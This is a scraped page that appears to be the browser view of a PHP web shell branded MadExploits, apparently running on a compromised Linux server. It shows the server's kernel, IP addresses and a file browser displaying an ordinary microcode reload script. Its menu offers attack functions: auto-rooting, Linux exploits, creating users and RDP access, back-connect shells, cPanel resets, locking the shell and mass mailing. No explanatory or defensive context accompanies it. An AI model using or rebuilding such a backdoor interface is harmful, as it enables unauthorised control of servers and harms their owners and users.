Linux ip-148-66-134-25.ip.secureserver.net 3.10.0-1160.119.1.el7.tuxcare.els10.x86_64 #1 SMP Fri Oct 11 21:40:41 UTC 2024 x86_64
Apache
: 148.66.134.25 | : 3.15.186.78
66 Domain
8.0.30
amvm
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
BLACK DEFEND!
README
+ Create Folder
+ Create File
/
usr /
libexec /
microcode_ctl /
[ HOME SHELL ]
Name
Size
Permission
Action
check_caveats
26.96
KB
-rwxr-xr-x
reload_microcode
573
B
-rwxr-xr-x
update_ucode
7.33
KB
-rwxr-xr-x
Delete
Unzip
Zip
${this.title}
Close
Code Editor : reload_microcode
#! /bin/bash -efu # Trigger microcode reload with additional check for BDW-EP that can have # microcode reloaded only in case kernel has specific patches. # # SPDX-License-Identifier: CC0-1.0 export LC_ALL=C CHECK_CAVEATS=/usr/libexec/microcode_ctl/check_caveats IGNORE_HYPERVISOR="/etc/microcode_ctl/ignore-hypervisor-flag" [ -e "$IGNORE_HYPERVISOR" ] || { if grep -q '^flags[[:space:]]*:.* hypervisor\( .*\)\?$' /proc/cpuinfo then exit 0 fi } "$CHECK_CAVEATS" -m > /dev/null || exit 0 echo 2>/dev/null 1 > /sys/devices/system/cpu/microcode/reload || : exit 0
Close